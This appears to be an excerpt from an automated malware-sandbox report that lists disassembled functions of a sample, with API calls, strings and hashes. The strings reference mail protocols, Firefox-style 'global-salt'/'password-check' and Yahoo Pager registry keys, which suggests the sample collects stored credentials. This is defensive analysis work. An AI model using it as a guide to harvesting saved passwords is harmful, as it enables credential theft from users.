                                          • Instruction ID: ed198900897cbedb477538fc3de06edee324e7a25cf08c3aedaf46951cf6a217
                                          • Opcode Fuzzy Hash: 2d6e1bcf4ff3e6172611e80a7a4ba5e9016df722be47fe83c526ca1b4cac1376
                                          • Instruction Fuzzy Hash: 14318672804219AFEF21EF65C8819DEBBB5EF45314F5480AAF108A3200CB396F84DF49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404469, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                          • _strcmpi.MSVCRT ref: 004044FA
                                          • _strcmpi.MSVCRT ref: 00404518
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi$memcpystrlen
                                          • String ID: imap$pop3$smtp
                                          • API String ID: 2025310588-821077329
                                          • Opcode ID: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                          • Instruction ID: ee17be80c36da3591ff53c386c7625c128025028662cc5e87d89578f4f8b6d75
                                          • Opcode Fuzzy Hash: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                          • Instruction Fuzzy Hash: C42196B25046189BEB51DB15CD417DAB3FCEF90304F10006BE79AB7181DB787B498B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403A53, Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00403A78
                                          • memset.MSVCRT ref: 00403A91
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
                                          • strlen.MSVCRT ref: 00403AD9
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWidememset$FileWritestrlen
                                          • String ID:
                                          • API String ID: 1786725549-0
                                          • Opcode ID: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                          • Instruction ID: 3c11530c7ff43e2cab0ee1a3c4b7d34204fc8064c5823527b9b114d7af9e1f20
                                          • Opcode Fuzzy Hash: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                          • Instruction Fuzzy Hash: 50112DBA80412CBFFB10AB94DC85EEBB3ADEF09355F0001A6B715D2092D6359F548B78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406113, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcmp.MSVCRT ref: 00406129
                                            • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
                                          • memcmp.MSVCRT ref: 00406154
                                          • memcmp.MSVCRT ref: 0040617C
                                          • memcpy.MSVCRT ref: 00406199
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID: global-salt$password-check
                                          • API String ID: 231171946-3927197501
                                          • Opcode ID: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                          • Instruction ID: 655c6eb068c7835b63414ef3c9938ae25085d91347c247b77763f6b5778615a8
                                          • Opcode Fuzzy Hash: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                          • Instruction Fuzzy Hash: E301D8B954070466FF202A628C42B8B37585F51758F024137FD067D2D3E37E87748A4E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00442960, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: fcdbebc5791becb3e42294bedc04b206a375e5be5d428e1146e567d7d5b4feca
                                          • Instruction ID: 5b630ca211e00ee6ab232d4f5fe81ba50f7f923f282134244f429d4b925a3085
                                          • Opcode Fuzzy Hash: fcdbebc5791becb3e42294bedc04b206a375e5be5d428e1146e567d7d5b4feca
                                          • Instruction Fuzzy Hash: 7501A272E0AD31A7E1257A76554135BE3686F04B29F05024FB904772428B6C7C5445DE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401693, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 004016A2
                                          • GetSystemMetrics.USER32(00000015), ref: 004016B0
                                          • GetSystemMetrics.USER32(00000014), ref: 004016BC
                                          • BeginPaint.USER32(?,?), ref: 004016D6
                                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
                                          • EndPaint.USER32(?,?), ref: 004016F2
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                          • String ID:
                                          • API String ID: 19018683-0
                                          • Opcode ID: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                          • Instruction ID: 724a62348f30ed3062fc78c586e299175c66965872e24402369681ac2eeab922
                                          • Opcode Fuzzy Hash: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                          • Instruction Fuzzy Hash: 0701FB76900619AFDF04DFA8DC499FE7BBDFB45301F00046AEA11AB295DAB1A914CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C319, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(?), ref: 0040C352
                                          • SetFocus.USER32(?,?,?), ref: 0040C3F8
                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: DestroyFocusInvalidateRectWindow
                                          • String ID: XgD$rY@
                                          • API String ID: 3502187192-1347721759
                                          • Opcode ID: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                          • Instruction ID: f774ea8d8eb1800fd2ad86f321479c1d669f6cdc6fcff53b53818c93aeeaee42
                                          • Opcode Fuzzy Hash: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                          • Instruction Fuzzy Hash: 6F518630A04701DBCB34BB658885D9AB3E0BF51724F44C63FF4656B2E2C779A9818B8D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004062D9, Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00406376
                                          • memcpy.MSVCRT ref: 00406389
                                          • memcpy.MSVCRT ref: 0040639C
                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                          • memcpy.MSVCRT ref: 004063E0
                                          • memcpy.MSVCRT ref: 004063F3
                                          • memcpy.MSVCRT ref: 00406420
                                          • memcpy.MSVCRT ref: 00406435
                                            • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID:
                                          • API String ID: 438689982-0
                                          • Opcode ID: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                          • Instruction ID: a962c966a65fcbb98db0a5903e2df7d2d9caef1a51b72161af640e80cc8fe1a9
                                          • Opcode Fuzzy Hash: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                          • Instruction Fuzzy Hash: 744140B290050DBEEB51DAE8CC41EEFBB7CAB4C704F004476F704F6051E635AA598BA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004032A9, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
                                          • memset.MSVCRT ref: 004032FD
                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
                                          • strchr.MSVCRT ref: 0040334C
                                            • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
                                          • strlen.MSVCRT ref: 0040338E
                                            • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                          • String ID: Personalities
                                          • API String ID: 2103853322-4287407858
                                          • Opcode ID: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                          • Instruction ID: 94df084552130989d7eb446100fdb0be3a34b05fea2c71b6ffce82199638926a
                                          • Opcode Fuzzy Hash: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                          • Instruction Fuzzy Hash: 5921BA71B04158AADB11EF65DC81ADDBB6C9F10309F1400BBFA44F7281DA78DB46866D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004101D8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                          • memcpy.MSVCRT ref: 00410238
                                          Strings
                                          • 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
                                          • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FromStringUuid$memcpy
                                          • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                          • API String ID: 2859077140-3316789007
                                          • Opcode ID: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                          • Instruction ID: ae29383cbd57fcea5ed56c9c200a46c16443c4e74b3f506479b718b79cf0bdd8
                                          • Opcode Fuzzy Hash: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                          • Instruction Fuzzy Hash: 1801C43790001CBADF019B94CC40EEB7BACEF4A354F004023FD55D6141E678EA8487A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00443A35, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00443A57
                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpenQueryValuememset
                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                          • API String ID: 1830152886-1703613266
                                          • Opcode ID: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                          • Instruction ID: 86b235c3fd45d03c271013e996efd952a38f3d6ae4618920ee3f021b32bc4f63
                                          • Opcode Fuzzy Hash: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                          • Instruction Fuzzy Hash: 500192B6900118BBEB10AA55CD01FAE7A6C9F90715F140076FF08F2212E379DF5587A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040900D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00409031
                                          • GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                          • _mbscpy.MSVCRT ref: 0040906D
                                          Strings
                                          • {?@ UD, xrefs: 0040900D
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileString_mbscpymemset
                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
                                          • API String ID: 408644273-2682877464
                                          • Opcode ID: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                          • Instruction ID: 644781a60c69e86f7c2c511092586478b4ed4a6ca21543a67b17e89033411e60
                                          • Opcode Fuzzy Hash: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                          • Instruction Fuzzy Hash: 53F0E9729041987BEB129764EC01FCA77AC9B4974BF1000E6FB49F10C2D5F89EC48AAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410909, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,745D48C0,00405E9E,00000000), ref: 00410912
                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
                                          • FreeLibrary.KERNEL32(00000000), ref: 00410938
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID: SHAutoComplete$shlwapi.dll
                                          • API String ID: 145871493-1506664499
                                          • Opcode ID: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                          • Instruction ID: 7569959bf229cfaf5f1ab8cb2858e1476927bfd88fe16924fdc565eaa6c9b3dd
                                          • Opcode Fuzzy Hash: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                          • Instruction Fuzzy Hash: 15D05B797006107BFB215735BC08FEF6AE5DFC77527050035F950E1151CB648C42896A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043D438, Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 478COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID: $no query solution
                                          • API String ID: 368790112-326442043
                                          • Opcode ID: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                          • Instruction ID: 5801c9734c6bd427e286c4e355069e6ae2e92931dd4aa2b8c604a71db9229eec
                                          • Opcode Fuzzy Hash: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                          • Instruction Fuzzy Hash: D012AC75D006199FCB24CF99D481AAEF7F1FF08314F14915EE899AB351E338A981CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043000F, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 237COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • foreign key on %s should reference only one column of table %T, xrefs: 0043005F
                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
                                          • unknown column "%s" in foreign key definition, xrefs: 0043027A
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                          • API String ID: 3510742995-272990098
                                          • Opcode ID: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                          • Instruction ID: b65499b1f20d22348a3d217da3c858198d90c87fbf4aa33eef889ec12c855700
                                          • Opcode Fuzzy Hash: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                          • Instruction Fuzzy Hash: BFA14C75A00209DFCB14CF99D590AAEBBF1FF48304F14869AE805AB312D779EE51CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043CB52, Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 214COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset
                                          • String ID: H
                                          • API String ID: 2221118986-2852464175
                                          • Opcode ID: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                          • Instruction ID: 0231d824907604898156c72f74438a53b00a2a6e63cdef361d574d9feb60fc4e
                                          • Opcode Fuzzy Hash: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                          • Instruction Fuzzy Hash: 9D915775C00219DBDF20CF95C881AAEF7B5FF48304F14949AE959BB241E334AA85CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041D3D8, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 175COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID: @ $SQLite format 3
                                          • API String ID: 231171946-3708268960
                                          • Opcode ID: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                          • Instruction ID: 154dd893183b882ddc8616fc7eef56b16fb129afe1b119523047def7d92feb70
                                          • Opcode Fuzzy Hash: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                          • Instruction Fuzzy Hash: C451B1B1E00604AFDB20DF69C881BDAB7F5AF54308F14056FD44597741E778EA84CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A8C2, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                          • memset.MSVCRT ref: 0040A8F8
                                            • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                          • sprintf.MSVCRT ref: 0040A93D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                          • String ID: <%s>%s</%s>$</item>$<item>
                                          • API String ID: 3337535707-2769808009
                                          • Opcode ID: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                          • Instruction ID: b3463478cabe4832a9b1b799bbf2f925c18d395200ae258af25e9b21d14a16f2
                                          • Opcode Fuzzy Hash: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                          • Instruction Fuzzy Hash: 3611BF31600225BFEB11AF64CC42F957B64FF04318F10406AF509265A2DB7ABD70DB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040717E, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf
                                          • String ID:
                                          • API String ID: 125969286-0
                                          • Opcode ID: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                          • Instruction ID: 1eb43bd5b8120d09ab0b11fdee56c07fa856cfecb869048c22175c4298d2535e
                                          • Opcode Fuzzy Hash: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                          • Instruction Fuzzy Hash: EF014C32D0826436F72156159C03BBB77A89B85704F10407FFD44A92C1EEBCE984479A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B6EF, Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
                                            • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
                                            • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
                                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
                                            • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
                                            • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                          • SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
                                          • SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                          • String ID:
                                          • API String ID: 2374668499-0
                                          • Opcode ID: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                          • Instruction ID: 612281c0e7bcc4a6d3b4da52a7b96f70e992a4283d6ab6b50bd9db3d0aad170a
                                          • Opcode Fuzzy Hash: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                          • Instruction Fuzzy Hash: 120129B5200A00EFD726AB75CC85FA6B7E9FF48315F0604B9F1199B272CA726D018F14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040AA94, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040AAB7
                                          • memset.MSVCRT ref: 0040AACD
                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                          • sprintf.MSVCRT ref: 0040AB04
                                          Strings
                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
                                          • <%s>, xrefs: 0040AAFE
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                          • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                          • API String ID: 3699762281-1998499579
                                          • Opcode ID: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                          • Instruction ID: a3dff73391336119dc4caae329f843e57b3ce466119e41e431a2bb454e721b3a
                                          • Opcode Fuzzy Hash: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                          • Instruction Fuzzy Hash: ED01F7729401296AEB20B655CC45FDA7A6CAF45305F0400BAB509B2182DBB49E548BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040979F, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: f6a7cb9cab936f08d15dd8d23444ed7b17806203963db2ce2ba1a06719781879
                                          • Instruction ID: ea629a9aafeff6281071dae141f51b3a8c797cef86d835f03ce988520f4efe7f
                                          • Opcode Fuzzy Hash: f6a7cb9cab936f08d15dd8d23444ed7b17806203963db2ce2ba1a06719781879
                                          • Instruction Fuzzy Hash: 94F0FF73609B01DBD7209FA99AC065BF7E9AB48724BA4093FF149D3642C738BC54C618
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409805, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                            • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 02bd71189ddcce43ee684b345b6da2237f54ddd92cd3481cc251e08af4b36a79
                                          • Instruction ID: 7a7d368fa20b86f0ae4ccc19201ff918d3b0396c1b4e5cf9e7c68f971a3fafa8
                                          • Opcode Fuzzy Hash: 02bd71189ddcce43ee684b345b6da2237f54ddd92cd3481cc251e08af4b36a79
                                          • Instruction Fuzzy Hash: 29F03633D1A930D7C6257B66500164EE3686E86B3931942AFF9047B7D28F3C7C5485DE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004100EC, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                            • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                            • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                          • SetBkMode.GDI32(?,00000001), ref: 00410113
                                          • GetSysColor.USER32(00000005), ref: 0041011B
                                          • SetBkColor.GDI32(?,00000000), ref: 00410125
                                          • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                          • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                          • String ID:
                                          • API String ID: 2775283111-0
                                          • Opcode ID: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                          • Instruction ID: 15b5804eddbfc7b45e8a586a0394ac07707e7803bdc14c23b44bbc646b24dc1f
                                          • Opcode Fuzzy Hash: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
